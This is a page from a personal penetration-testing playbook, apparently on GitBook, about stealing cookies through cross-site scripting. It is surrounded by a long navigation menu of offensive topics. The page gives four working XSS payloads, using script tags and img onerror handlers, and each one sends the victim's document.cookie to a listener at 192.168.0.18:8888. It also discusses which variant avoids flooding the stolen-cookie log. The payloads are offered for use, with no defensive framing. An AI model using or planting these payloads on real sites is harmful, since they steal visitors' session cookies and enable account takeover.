🎃
Jackmeister's Playbook
  • Welcome
  • Web Pentest
    • Mind Maps
    • Server Site Attacks
      • php type juggling
      • SSTI
      • SQL
        • PSG SQL
        • SQL Database Uses
        • SQL Injection
        • Blind SQL injection
        • SQLITE injection
      • psy shell
    • Recon
      • DNS Hunting
      • Web Tech Hunting
      • Credentials Harvesting
      • Subdomain Hunting
      • Javascript Hunting
    • Directory Brute Forcing
    • File Upload Tricks
      • PHP htaccess and ASP web.config bypass
      • PHP Exiftool edit and upload
      • PHP Extensions payloads / Cheatsheet
      • PHP disable_functions bypass
    • Client Site Attacks
      • Case Study - XSS-GPT
      • XSS
        • XSS All in one
        • XSS cookie stealing
        • Payloads / Cheatsheet
      • Javascript Crafting
      • PDF
    • CMS / Framework
      • apache / xampp
      • Django
      • Manegto
      • Joomla
      • Jenkins
      • Flask jinja2
      • tomcat
      • Drupal
      • nodejs
      • wordpress
    • Google Dorking
    • API
    • Command Injection
      • Command Injection Payloads/Cheatsheet
    • Rewrite URL
    • HTTP Request Smuggling (CL.TE)
  • Network Pentest
    • Linux
      • Internal Port Scanning
      • Privileges Escalation
      • Finding files
      • OVA2ROOT
    • Window
      • AV Evading
      • Chrome Password Extract
      • Internal Port Scanning
      • Privileges Escalation
      • ALL IN ONE
      • THM Priv Esc
      • Post Compromise
    • Port Forwarding
      • Playground Setup
    • Exploit Hunting
      • Searchsploit
    • tty-interactive-shell
    • Active Directory (AD)
      • Crackmapexec
  • Wireless Pentest
    • Airgeddon
    • Evil Twin
    • Aircrack
  • Vulnerability Assessment
    • Nmap
    • Nessus
  • General
    • Kiosk Escaping
    • Credential Bruteforcing
  • System Hardening
  • Phishing
    • Gophish
    • Mailing Server
    • SMS Server
    • DNS Server
Powered by GitBook
On this page

Was this helpful?

  1. Web Pentest
  2. Client Site Attacks
  3. XSS

XSS cookie stealing

Inject the XSS Attack Code

Below are four versions of the same attack.

1. alert() Before Stealing the Cookie

Run this version of the attack code if you want to see the cookie in a JS alert() as confirmation that the injection is successfully exploiting the vulnerability on the target site. Note that the cookie will not upload to your Python listener until the victim closes the JS alert() dialog.

<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>

2. Silent One-Liner

This one is the same but no alert() and all on one line.

<script>var i=new Image;i.src="http://192.168.0.18:8888/?"+document.cookie;</script>

3. <img> Tag Instead of <script> Tags

Don't use this one! It works but calls onerror() in a loop, filling up your stolen cookie log:

<img src=x onerror=this.src='http://192.168.0.18:8888/?'+document.cookie;>

4. <img> Tag and Without the Infinite Loop

This one works and will only steal the cookie once. I adapted it from a posting on the old [kirupa.com][4] forum.

<img src=x onerror="this.src='http://192.168.0.18:8888/?'+document.cookie; this.removeAttribute('onerror');">
PreviousXSS All in oneNextPayloads / Cheatsheet

Last updated 1 year ago

Was this helpful?